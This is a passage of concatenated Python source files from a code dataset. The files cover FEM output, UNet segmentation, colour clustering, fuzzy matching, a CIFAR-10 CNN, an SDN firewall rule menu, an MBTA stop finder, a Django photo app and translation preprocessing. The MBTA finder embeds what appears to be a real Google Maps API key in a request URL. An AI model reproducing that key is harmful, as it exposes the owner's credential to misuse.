model_part.ProcessInfo[DELTA_TIME] = time_step\n gid_io.WriteNodalResults(DISPLACEMENT,model_part.Nodes,i,0)\n # var = raw_input(\"Finish step, go ahead?: \")\n\ngid_io.FinalizeResults()\n# print(\"NumberOfMeshes is \", model_part.NumberOfMeshes)\n\nsys.exit(1)\nfor node in model_part.GetMesh(0).Nodes:\n if node.Y == 0:\n print(node.GetSolutionStepValue(DISPLACEMENT,0))\n # print(node.Id)\n # sys.exit(1)\n# import numpy as np\n# no1 = np.zeros((622, 2), dtype=np.double)\n# no2 = np.zeros((622, 2), dtype=np.double)\n# i = 0\n# j = 0\n# for node in model_part.Nodes:\n# if(node.GetSolutionStepValue(IS_BODY) == 2):\n# no1[i] = (node.X, node.Y)\n# i = i + 1\n# else:\n# no2[j] = (node.X, node.Y)\n# j = j + 1\n# import matplotlib.pyplot as plt\n# plt.plot(no2[:, 0], no2[:, 1], 'bs', no1[:, 0], no1[:, 1], 'ro')\n# os.chdir(\"/home/hoan/Desktop\")\n# plt.savefig(\"body.png\")\n# plt.show()\n# we create a mesh for the postprocess\n","sub_path":"contact_2D_application/test_examples/test_mortar/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"46764737","text":"'''\r\n该文件用于将模型加载,对请求中的图片进行预处理以及预测\r\n@Project :FlatAngleAPI\r\n@File :utils_v1.py\r\n@Author :谢逸帆\r\n@Date :2021/7/14 14:23 \r\n'''\r\nimport cv2\r\nimport tensorflow as tf\r\nimport pathlib\r\nfrom Segmentation.UNet.info import *\r\nimport numpy as np\r\n\r\nfile_root = UN_PRODUCED_FILE_PTAH\r\n\r\nmodel = tf.keras.models.load_model(MODULE_PATH)\r\n\r\n\r\ndef load_dataset(image_name):\r\n \"\"\"\r\n 将客户端传来的图片文件转为张量数据集\r\n \"\"\"\r\n file_paths = list(pathlib.Path(file_root).glob(fr'{image_name}'))\r\n file_paths = [str(path) for path in file_paths]\r\n file_ds = tf.data.Dataset.from_tensor_slices(file_paths)\r\n file_ds = file_ds.map(load_and_decode_img)\r\n file_ds = file_ds.batch(1)\r\n return file_ds\r\n\r\n\r\ndef load_and_decode_img(path):\r\n \"\"\"\r\n 根据图片路径将图片转换为张量\r\n \"\"\"\r\n img = tf.io.read_file(path)\r\n img = tf.image.decode_image(img, channels=3)\r\n return img\r\n\r\n\r\ndef process(file, image_path):\r\n \"\"\"\r\n 模型进行预测并处理图像\r\n \"\"\"\r\n img = tf.image.resize(file, (MODULE_SIZE, MODULE_SIZE))\r\n img = tf.cast(img, tf.float32) / 255.0\r\n mask = create_mask(model.predict(img))\r\n mask = tf.image.resize(mask, (file.shape[1], file.shape[2]))\r\n mask = mask.numpy()\r\n # 优化部分\r\n kernel = np.ones((int(2 * mask.shape[0] / MODULE_SIZE), int(2 * mask.shape[1] / MODULE_SIZE)),\r\n dtype=np.uint8)\r\n mask = cv2.dilate(mask, kernel, 1)\r\n mask = cv2.medianBlur(mask, 5)\r\n #\r\n image = cv2.imread(image_path)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2BGRA)\r\n mask = np.expand_dims(mask, axis=2)\r\n image = image * mask\r\n\r\n return image\r\n\r\n\r\ndef create_mask(pred_mask):\r\n \"\"\"\r\n 将predict返回的标签掩码图张量译码为012的格式\r\n \"\"\"\r\n pred_mask = tf.argmax(pred_mask, axis=-1)\r\n pred_mask = pred_mask[..., tf.newaxis]\r\n pred_mask = pred_mask[0]\r\n\r\n return pred_mask\r\n","sub_path":"UNet/utils_v1.py","file_name":"utils_v1.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610846632","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n################################\n################################\n# Class명 : GatherColorInformation\n# 작성자 : 이현지\n# 설명 : user가 입력한 이미지를 분석하여 색 띠 반환\n# 참고한 코드 출처 : https://buzzrobot.com/dominant-colors-in-an-image-using-k-means-clustering-3c7af4622036\n################################\n################################\nclass GatherColorInformation:\n\n CLUSTERS = None\n IMAGE = None\n COLORS = None\n LABELS = None\n\n def __init__(self, image, clusters=3):\n self.CLUSTERS = clusters\n self.IMAGE = image\n\n #kmeans clustering 알고리즘을 이용하여 각 픽셀 처리\n #cluster값은 5로 제시한다.\n def dominantColors(self):\n img = cv2.imread(self.IMAGE)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = img.reshape((img.shape[0] * img.shape[1]), 3)\n kmeans = KMeans(n_clusters=self.CLUSTERS)\n kmeans.fit(img)\n\n return kmeans\n\n # clusters=5에 따라 5개의 색상(r,g,b)을 return 하게 된다.\n def getRGB(self, kmeans):\n self.COLORS = kmeans.cluster_centers_\n self.LABELS = kmeans.labels_\n\n return self.COLORS.astype(int)\n\n #히스토그램으로 표현하기\n def intoHistogram(self, kmeans):\n numLabels = np.arange(0, self.CLUSTERS+1)\n (hist, _)=np.histogram(self.LABELS, bins=numLabels)\n\n hist=hist.astype(\"float\")\n hist /= hist.sum()\n\n return hist\n\n #색상이 차지하는 비율 순으로 정렬한 후, 이를 바탕으로 색 띠를 생성하여 리턴한다\n def plot_colors(self, hist, centroids):\n colors=self.COLORS\n colors=colors[(-hist).argsort()]\n hist=hist[(-hist).argsort()]\n\n bar=np.zeros((50,500,3), dtype=\"uint8\")\n startX=0\n\n for i in range(0, self.CLUSTERS-1):\n endX= startX+hist[i]*500\n\n r=int(colors[i][0])\n g=int(colors[i][1])\n b=int(colors[i][2])\n\n cv2.rectangle(bar, (int(startX), 0), (int(endX), 50), (r,g,b), -1)\n startX=endX\n\n return bar\n\n################################\n################################\n# Class명 : Compare\n# 작성자 : 이현지\n# 설명 : 두 이미지를 분석한 색상 결과를 비교\n################################\n################################\nclass Compare:\n\n colorA=None\n ColorB=None\n\n def __init__(self, colors):\n self.colorA=colors[0]\n self.colorB=colors[1]\n\n #두 이미지를 분석한 결과로 나온 dominant colors들을 비교\n #색상이 일치하지 않으면서, 이미지 내에서 차지하는 비율이 큰 색상을 no match color로 선정한다.\n def getNoMatchColor(self):\n noMatches = []\n for color in self.colorA:\n if color not in self.colorB:\n noMatches.append(color)\n\n noMatchColor = noMatches[0]\n\n return noMatchColor\n\n\n################################\n################################\n# Class명 : ImageProducing\n# 작성자 : 이현지\n# 설명 : no match color 영역을 이미지에서 찾아 표시한다\n# 참고한 코드 출처 : https://www.pyimagesearch.com/2014/08/04/opencv-python-color-detection/\n################################\n################################\nclass ImageProducing:\n\n IMAGE = None\n\n def __init__(self, image):\n self.IMAGE = cv2.imread(image)\n\n def markNoMatchColor(self,color):\n\n hsv = cv2.cvtColor(self.IMAGE, cv2.COLOR_BGR2HSV)\n\n #rgb순으로 표현되어있는 color를 bgr형태로 변환\n [b,g,r]=[color[2],color[1],color[0]]\n bgrColor=np.uint8([[[b,g,r]]])\n\n #색상 추출을 위해 bgr을 hsv로 변환\n hsv_noMatch=cv2.cvtColor(bgrColor, cv2.COLOR_BGR2HSV)\n\n #색상의 min hsv, max hsv 범위 추출\n min_h=hsv_noMatch[0][0][0]-10\n min_noMatch=np.array([min_h, 100, 100])\n max_h=hsv_noMatch[0][0][0]+10\n max_noMatch=np.array([max_h, 255, 255])\n kernel = np.ones((5, 5), \"uint8\")\n\n noMatch=cv2.inRange(hsv, min_noMatch, max_noMatch)\n noMatch=cv2.dilate(noMatch, kernel)\n\n #no match color 영역 표시하기\n (_, contours, hierarchy) = cv2.findContours(noMatch, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n for pic, contour in enumerate(contours):\n area = cv2.contourArea(contour)\n if (area > 150):\n ellipse=cv2.fitEllipse(contour)\n cv2.ellipse(self.IMAGE, ellipse, (0,0,255),1, cv2.LINE_AA)\n\n cv2.imshow('marked image', self.IMAGE)\n\n\nuser='../images/NoMatch_testImage/room2.jpg'\nideal='../images/NoMatch_testImage/room6.jpg'\ntestimage='testimage.jpg'\nimages=[user, ideal]\ncolors=[]\nbars=[]\nclusters=5\n\nfor i in range(len(images)):\n colorInfo=GatherColorInformation(images[i], clusters)\n kmeans=colorInfo.dominantColors()\n color=colorInfo.getRGB(kmeans)\n colors.append(color)\n hist=colorInfo.intoHistogram(kmeans)\n bar=colorInfo.plot_colors(hist, kmeans.cluster_centers_)\n bars.append(bar)\n\n\ncmp=Compare(colors)\nnoMatch=cmp.getNoMatchColor()\n\n#이미지 display\nuserRoom=cv2.imread('../images/NoMatch_testImage/room2.jpg')\nidealRoom=cv2.imread('../images/NoMatch_testImage/room6.jpg')\n\ncv2.imshow('user room', userRoom)\nif(len(images)==2):\n cv2.imshow('ideal room', idealRoom)\n\nfor i in range(len(images)):\n plt.figure()\n plt.axis(\"off\")\n plt.imshow(bars[i])\nplt.show()\n\nmark=ImageProducing(images[0])\nmark.markNoMatchColor(noMatch)\n\nkey = cv2.waitKey(0)\nif key == 27:\n cv2.destroyAllWindows()\n\n\n\n","sub_path":"Python/NoMatchColor.py","file_name":"NoMatchColor.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"92494210","text":"from fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport pandas\n\ndef get_product_choices():\n colnames = [\"FOOD_NAME\", \"SCIENTIFIC_NAME\",\t\"GROUP\" ,\"SUB_GROUP\"]\n data = pandas.read_csv('generic-food.csv', names=colnames)\n\n choices = data.FOOD_NAME.tolist()\n return choices\n\ndef main():\n products = get_product_choices()\n guesses = [\"tomato sauce\", \"frt salad\", \"ft sd\"]\n\n for guess in guesses:\n res = process.extractOne(guess, products)\n print(\"guess <\" + guess + \"> gives you <\" + res[0] + \"> with a ratio value of <\" + str(res[1]) + \">\")\n print(res)\n\n\nif __name__ == '__main__':\n main()","sub_path":"hello_fuzzy.py","file_name":"hello_fuzzy.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"506192362","text":"# test harness for evaluating models on the cifar10 dataset\nimport sys\nfrom matplotlib import pyplot\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.optimizers import SGD\n\n\n\ntags = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\n\n# load train and test dataset\ndef load_dataset():\n\t# load dataset\n\t(trainX, trainY), (testX, testY) = cifar10.load_data()\n\t# one hot encode target values\n\ttrainY = to_categorical(trainY)\n\ttestY = to_categorical(testY)\n\treturn trainX, trainY, testX, testY\n\n# scale pixels\ndef prep_pixels(train, test):\n\t# convert from integers to floats\n\ttrain_norm = train.astype('float32')\n\ttest_norm = test.astype('float32')\n\t# normalize to range 0-1\n\ttrain_norm = train_norm / 255.0\n\ttest_norm = test_norm / 255.0\n\t# return normalized images\n\treturn train_norm, test_norm\n\n# define cnn model\ndef define_model():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n\tmodel.add(Dense(10, activation='softmax'))\n\t# compile model\n\topt = SGD(learning_rate=0.001, momentum=0.9)\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\n\n# run the test harness for evaluating a model\ndef run_test_harness():\n\t# load dataset\n\ttrainX, trainY, testX, testY = load_dataset()\n\t# prepare pixel data\n\ttrainX, testX = prep_pixels(trainX, testX)\n\t# define model\n\tmodel = define_model()\n # fit model\n\thistory = model.fit(trainX, trainY, epochs=1, batch_size=128, validation_data=(testX, testY))\n\t# evaluate model\n\t_, acc = model.evaluate(testX, testY)\n\tprint('> %.3f' % (acc * 100.0))\n\t# learning curves\n\t#summarize_diagnostics(history)\n\n# entry point, run the test harness\nrun_test_harness()","sub_path":"VGG-one-block.py","file_name":"VGG-one-block.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"109916181","text":"#!/usr/bin/python\n\nimport requests\nimport json\nimport getopt\nimport sys\nimport signal\nimport Firewall as server\n\nfilename2=\"./firewall_flows_menu\"\n\ndef f(signo, stack):\n server.cleanUp()\n exit(0)\n\ndef application(argv):\n username = \"admin\"\n password = \"admin\"\n ip = \"127.0.0.1\"\n port = \"8181\"\n opts, args = getopt.getopt(argv, \"p:i:d:\", [\"ip=\", \"port=\", \"debug\"])\n debug = False\n\n for opt, arg in opts:\n if opt in (\"-p\", \"--port\"):\n port = arg\n elif opt in (\"-d\", \"--debug\"):\n debug = True\n elif opt in (\"-i\", \"--ip\"):\n ip = arg\n\n\n print(\"Initializing application with arguments: \")\n print(\"\\tUsername: %s \" % username)\n print(\"\\tPassword: %s \" % password)\n print(\"\\tServer socket: %s:%s \" % (ip, port))\n print(\"\")\n\n server.init(ip, port, username, password)\n\n if debug:\n status, data = server.getTopology()\n print(\"Status: \" + str(status))\n print(\"Data : \" + str(data))\n\n # raw_input(\"press enter to activate firewall\")\n\n signal.signal(signal.SIGINT, f)\n\n \n\n ids_per_case = {}\n\n flow_id = 1\n\n while True:\n filee = open(filename2, \"r\")\n print(filee.read())\n line = raw_input(\"Type your command:\")\n\n tokens = line.split(\" \")\n\n flow_id = flow_id +1\n\n x = tokens[0]\n y = tokens[1] if len(tokens) > 1 else None\n\n if x == 'e' or x == \"exit\":\n break\n\n if x == \"on\": \n if y == \"1\":\n print(\"adding rules of case #1: Block ICMP on switch 1\")\n status, data, topologyIdentity1 = server.addBlockAction(1, 0, 1, \"ICMP\") \n if not ids_per_case.get(\"1\"):\n ids_per_case[\"1\"] = []\n ids_per_case[\"1\"].append(topologyIdentity1)\n \n if y == \"2\":\n print(\"adding rules of case #2: Block any TCP connection from 10.0.0.[1-3] to 10.0.0.5 on switch 1\")\n status, data, topologyIdentity2 = server.addBlockAction(1, 0, 2, \"TCP\", \"10.0.0.0/30\", \"10.0.0.5/32\") \n if not ids_per_case.get(\"2\"):\n ids_per_case[\"2\"] = []\n ids_per_case[\"2\"].append(topologyIdentity2) \n\n if y == \"3\":\n print(\"adding rules of case #3: Block any TCP connection from 10.0.1.[1-5] to 10.0.0.5 on switch 2\")\n status, data, topologyIdentity3 = server.addBlockAction(2, 0, 3, \"TCP\", \"10.0.1.0/29\", \"10.0.0.5/32\") \n if not ids_per_case.get(\"3\"):\n ids_per_case[\"3\"] = []\n ids_per_case[\"3\"].append(topologyIdentity3) \n\n if y == \"4\":\n print(\"adding rules of case #4: Block any TCP connection from 10.0.0.4 to 10.0.0.5 on switch 2\")\n status, data, topologyIdentity4 = server.addBlockAction(2, 0, 4, \"TCP\", \"10.0.0.4/32\", \"10.0.0.5/32\") \n if not ids_per_case.get(\"4\"):\n ids_per_case[\"4\"] = []\n ids_per_case[\"4\"].append(topologyIdentity4) \n\n if y == \"5\":\n print(\"adding rules of case #5: Block any ICMP connection from 10.0.0.[1-3] to 10.0.1.[1-5] on switch 1\")\n status, data, topologyIdentity5 = server.addBlockAction(1, 0, 5, \"ICMP\", \"10.0.0.0/30\", \"10.0.1.0/29\") \n if not ids_per_case.get(\"5\"):\n ids_per_case[\"5\"] = []\n ids_per_case[\"5\"].append(topologyIdentity5) \n\n if y == \"6\":\n print(\"adding rules of case #6: Block any UDP connection from 10.0.0.[1-3] to 10.0.1.[1-5] on switch 1\")\n status, data, topologyIdentity6 = server.addBlockAction(1, 0, 6, \"UDP\", \"10.0.0.0/30\", \"10.0.1.0/29\",udp_src_port=\"5566\", udp_dest_port =\"5566\") \n\n if not ids_per_case.get(\"6\"):\n ids_per_case[\"6\"] = []\n ids_per_case[\"6\"].append(topologyIdentity6) \n\n if y == \"7\":\n print(\"adding rules of case #7: Block any connection from 10.0.1.[1-5] to further network on switch 1\")\n status, data, topologyIdentity7 = server.addBlockAction(2, 0, 7, None, \"10.0.1.0/29\",\"10.0.0.4/32\") \n\n if not ids_per_case.get(\"7\"):\n ids_per_case[\"7\"] = []\n ids_per_case[\"7\"].append(topologyIdentity7) \n\n if y == \"8\":\n print(\"adding rules of case #8: Block any connection between business hosts on switch 1\")\n status, data, topologyIdentity8 = server.addBlockAction(1, 0, 8, None, \"10.0.0.0/30\",\"10.0.0.0/30\") \n\n if not ids_per_case.get(\"8\"):\n ids_per_case[\"8\"] = []\n ids_per_case[\"8\"].append(topologyIdentity8) \n\n if x == \"off\":\n print(\"removing rules of case #\" + y)\n for ti in ids_per_case[y]:\n server.removeAction(ti) \n\n\n if x == 'h' or x == \"help\":\n filee = open(filename2, \"r\")\n print(filee.read())\n\n if x == 'c' or x == \"clear\":\n server.cleanUp() \n\n \n\n\n \n server.cleanUp()\n\n\nif __name__ == '__main__':\n application(sys.argv[1:])\n","sub_path":"exercise1/odl_controll/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"532133447","text":"\"\"\"\nGeocoding and Web APIs Project Toolbox exercise\n\nFind the MBTA stops closest to a given location.\n\nFull instructions are at:\nhttps://sites.google.com/site/sd15spring/home/project-toolbox/geocoding-and-web-apis\n\"\"\"\n\nimport urllib # urlencode function\nimport urllib2 # urlopen function (better than urllib version)\nimport json\nfrom pprint import pprint\n\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nGMAPS_BASE_URL = \"https://maps.googleapis.com/maps/api/geocode/json\"\nMBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\nMBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n f = urllib2.urlopen(url) #opens url\n response_text = f.read() #reads through url\n response_data = json.loads(response_text) #converts data to json\n return response_data\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n\n See https://developers.google.com/maps/documentation/geocoding/\n for Google Maps Geocode API URL formatting requirements.\n \"\"\"\n new_place = place_name.replace(' ', \"+\") #replaces spaces with + symbols for url \n url = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + new_place + \"&key=AIzaSyAqswAJZEulRtIHPvMpyCEYMT8XpU8uCM4\" \n #generates url and then retrives the json\n json = get_json(url)\n results = json[\"results\"][0]['geometry']['location'] #locates the necessary part of the dictionary in the json\n lat_long = results['lat'],results['lng'] #creates a tuple of lat and long\n return lat_long #tuple\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, distance)\n tuple for the nearest MBTA station to the given coordinates.\n\n See l for URL\n formatting requirements for the 'stopsbylocation' API.\n \"\"\"\n #makes latitude and longitude strings so that they can be entered into url\n latitude = str(latitude)\n longitude = str(longitude)\n #defines url\n url = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation?api_key=\"+ MBTA_DEMO_API_KEY + \"&lat=\" + latitude + \"&lon=\" + longitude + \"&format=json\"\n #generates json object and then calls the relevant quantities \n json = get_json(url)\n distance = json['stop'][0]['distance']\n stopname = json['stop'][0]['stop_name']\n #returns of a tuple of stopname, distance from stop\n return (stopname, distance)\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, print the nearest MBTA stop and the \n distance from the given place to that stop.\n \"\"\"\n #get lat and long of a place name, and then seperate the returned tuple into seperate entities\n lat_long = get_lat_long(place_name)\n lat = lat_long[0]\n lon = lat_long[1]\n #get the nearest stop from the lat lon entities \n stop_distance = get_nearest_station(lat, lon)\n #converts unicode to strings\n stop = str(stop_distance[0])\n distance = str(stop_distance[1])\n #returns a sentence indicating where the closest stop is to the place name enetered \n return place_name +' is ' + distance + \" miles away from \" + stop\n\n","sub_path":"toolbox/geocoding_apis/mbta_finder.py","file_name":"mbta_finder.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"71586867","text":"# FANAVARD 3.11.99\r\n\r\n\r\n# Team Name = AUT FAN\r\n\r\n# Team Member\r\n# َAli Rahimi\r\n# Hamid Parto Alam\r\n# Sina Hasan lou\r\n\r\n# number of objects\r\nn = int(input('Enter number of objects = '))\r\n\r\n# number of boxes\r\nm = int(input('Enter number of boxes = '))\r\n\r\n# size of boxes\r\nk = int(input('Enter size of boxes = '))\r\n\r\nai = []\r\n# each object size\r\nfor item in range(n):\r\n ai.append(int(input(\"a(\"+str(item+1)+\") = \")))\r\n\r\n\r\n# size arrays should be equal to number of objects\r\nif (len(ai) != n):\r\n print('wrong input')\r\n\r\nj = 1\r\nsize = k\r\n\r\nwhile (j<=n):\r\n # check if there is a box left\r\n if (m > 0):\r\n # check if the box has empty place\r\n if (ai[n-j] <= size):\r\n\r\n size = size-ai[n-j]\r\n j = j+1\r\n else:\r\n m = m-1 \r\n size = k\r\n else:\r\n break\r\n\r\n# print result\r\nres = j-1\r\nprint(\"Output = \" + str(res))\r\n","sub_path":"fanavard-01.py","file_name":"fanavard-01.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"331927366","text":"from django.shortcuts import render, get_object_or_404, redirect # 'get_object_or_404', 'redirect'を追加\nfrom django.contrib.auth.models import User # ←ユーザ情報追加\nfrom django.contrib.auth.forms import UserCreationForm # ←ユーザ登録追加\nfrom django.contrib.auth import authenticate, login # ←ログインフォーム追加\nfrom .models import Photo # Photoインスタンス\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PhotoForm\nfrom django.contrib import messages\nfrom django.views.decorators.http import require_POST\nfrom .models import Photo, Category\n\n# Create your views here. 下記追加\n# トップページの表示\ndef index(request):\n # Photoインスタンスを全件取得\n photos = Photo.objects.all().order_by('-created_at')\n # 取得したPhotoインスタンスをテンプレートに渡す\n return render(request, 'app/index.html', {'photos': photos})\n\n\n# ユーザページの表示\ndef users_detail(request, pk):\n # 登録されたユーザがある場合・ない場合のいづれかの値を'user'に代入\n user = get_object_or_404(User, pk=pk)\n # userに紐づく写真⼀覧を取得\n photos = user.photo_set.all().order_by('-created_at')\n # photosを追加\n return render(request, 'app/users_detail.html', {'user': user, 'photos': photos})\n\n\n# サインアップを表示\ndef signup(request):\n # POSTされた情報を元にユーザ情報を⽣成\n if request.method == 'POST':\n # Userインスタンスを作成\n form = UserCreationForm(request.POST)\n if form.is_valid():\n # Userインスタンスを保存\n form.save()\n # 入力されたユーザ名を受け取る\n input_username = form.cleaned_data['username']\n # 入力されたパスワードを受け取る\n input_password = form.cleaned_data['password1']\n # フォームの⼊⼒値で認証できればユーザーオブジェクト、できなければNoneを返す\n new_user = authenticate(\n # 引数の組み合わせで認証に成功すればUserオブジェクトを返し、認証できなければNoneを返す\n username=input_username,\n password=input_password,\n )\n # 認証成功時のみ、ユーザーをログインさせる\n if new_user is not None:\n # login関数は、認証ができてなくてもログインさせることができる(認証は上のauthenticateで実⾏する)\n # 引数はリクエスト情報とUserオブジェクトで、未ログイン状態からログイン状態にする\n login(request, new_user)\n # ユーザの詳細ページを表示\n return redirect('app:users_detail', pk=new_user.pk)\n else:\n form = UserCreationForm()\n # サインアップページを表示\n return render(request, 'app/signup.html', {'form': form})\n\n\n# 写真投稿ページを表示\n@login_required # デコレータ(関数の機能的に装飾):ログインしてなければ関数を実⾏せずログイン画⾯(settings.pyで設定したLOGIN_URL)にリダイレクト、ログインしているユーザーだけ関数を実行\ndef photos_new(request):\n # POSTされた情報を元にフォーム情報を⽣成\n if request.method == \"POST\":\n # Photoインスタンスを作成\n form = PhotoForm(request.POST, request.FILES)\n if form.is_valid():\n # ⼊⼒された情報からPhotoインスタンスを⽣成\n photo = form.save(commit=False)\n # ⽣成したPhotoインスタンスのuserフィールドに、request.user(写真を投稿したUserのオブジェクト)を代⼊\n photo.user = request.user\n # Photoインスタンスをデータベースに保存\n photo.save()\n # 正常にアップロードされた場合に成功メッセージを表⽰\n messages.success(request, \"投稿が完了しました!\")\n # ユーザの詳細ページを表示\n return redirect('app:users_detail', pk=request.user.pk)\n else:\n form = PhotoForm()\n # 新しい写真投稿ページを表示\n return render(request, 'app/photos_new.html', {'form': form})\n\n\n# 写真投稿詳細ページの表示\ndef photos_detail(request, pk):\n # 登録された写真がある場合・ない場合のいづれかの値を'photo'に代入\n photo = get_object_or_404(Photo, pk=pk)\n # 写真投稿詳細ページの表示\n return render(request, 'app/photos_detail.html', {'photo': photo})\n\n\n# 投稿削除ページの表示\n@require_POST\ndef photos_delete(request, pk):\n # 登録された写真がある場合・ない場合のいづれかの値を'photo'に代入\n photo = get_object_or_404(Photo, pk=pk, user=request.user)\n # 投稿写真を削除\n photo.delete()\n # ユーザの詳細ページを表示\n return redirect('app:users_detail', request.user.id)\n\n\n# カテゴリー別ページを表示\ndef photos_category(request, category):\n # titleがURLの⽂字列と⼀致するCategoryインスタンスを取得\n category = get_object_or_404(Category, title=category)\n # 取得したCategoryに属するPhoto⼀覧を取得\n photos = Photo.objects.filter(category=category).order_by('-created_at')\n # トップページをレンダリングして表示\n return render(\n request, 'app/index.html', {'photos': photos, 'category': category}\n )","sub_path":"PhotoService/PhotoService/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"172214876","text":"import hyperparameters\nimport sentencepiece as spm\nimport os\nimport errno\nimport sys\n\n\"\"\"\nScript to preprocess downloaded data files\n\nCommand line call template:\n \n preprocess.py \n\n model_name: name of saved_weights file to load.\n dataset_path: path to dataset files location, e.g. \"D:/Datasets/de-en\".\n\"\"\"\n\n\ndef preprocess(root_dir: str, hp_dict: dict):\n print(\"Checking files exist\")\n\n train_de = root_dir + \"/train.tags.de-en.de\"\n train_en = root_dir + \"/train.tags.de-en.en\"\n eval_de = root_dir + \"/IWSLT16.TED.tst2013.de-en.de.xml\"\n eval_en = root_dir + \"/IWSLT16.TED.tst2013.de-en.en.xml\"\n test_de = root_dir + \"/IWSLT16.TED.tst2014.de-en.de.xml\"\n test_en = root_dir + \"/IWSLT16.TED.tst2014.de-en.en.xml\"\n\n # Check files exist\n for f in (train_en, train_de, eval_en, eval_de, test_en, test_de):\n if not os.path.isfile(f):\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), f)\n\n print(\"Reformatting files\")\n\n reformat_dir = root_dir + \"/reformat\"\n os.makedirs(reformat_dir, exist_ok=True)\n\n train_de_prepro = reformat_plain(train_de, reformat_dir + \"/train.de\")\n train_en_prepro = reformat_plain(train_en, reformat_dir + \"/train.en\")\n assert len(train_de_prepro) == len(train_en_prepro)\n\n eval_de_prepro = reformat_xml(eval_de, reformat_dir + \"/eval.de\")\n eval_en_prepro = reformat_xml(eval_en, reformat_dir + \"/eval.en\")\n assert len(eval_de_prepro) == len(eval_en_prepro)\n\n test_de_prepro = reformat_xml(test_de, reformat_dir + \"/test.de\")\n test_en_prepro = reformat_xml(test_en, reformat_dir + \"/test.en\")\n assert len(test_de_prepro) == len(test_en_prepro)\n\n write_file(reformat_dir + \"/train\", train_de_prepro + train_en_prepro)\n\n print(\"Training a joint BPE model with sentencepiece\")\n\n segmented_dir = root_dir + \"/segmented\"\n os.makedirs(segmented_dir, exist_ok=True)\n\n parameters = '--input={}/train --pad_id=0 --unk_id=1 \\\n --bos_id=2 --eos_id=3\\\n --model_prefix={}/bpe --vocab_size={} \\\n --model_type=bpe'.format(reformat_dir, segmented_dir, hp_dict[\"vocab_size\"])\n spm.SentencePieceTrainer.Train(parameters)\n\n print(\"Segmenting files using bpe model\")\n\n sp = spm.SentencePieceProcessor()\n sp.Load(segmented_dir + \"/bpe.model\")\n\n segment(train_de_prepro, segmented_dir + \"/train.de.bpe\", sp)\n segment(train_en_prepro, segmented_dir + \"/train.en.bpe\", sp)\n segment(eval_de_prepro, segmented_dir + \"/eval.de.bpe\", sp)\n segment(eval_en_prepro, segmented_dir + \"/eval.en.bpe\", sp)\n segment(test_de_prepro, segmented_dir + \"/test.de.bpe\", sp)\n segment(test_en_prepro, segmented_dir + \"/test.en.bpe\", sp)\n\n\ndef reformat_plain(file_path: str, new_path: str):\n lines = []\n with open(file_path, \"r\", encoding=\"utf8\") as file, open(new_path, \"w\", encoding=\"utf8\") as new_file:\n for line in file.read().split(\"\\n\"):\n if not line.startswith(\"<\"):\n 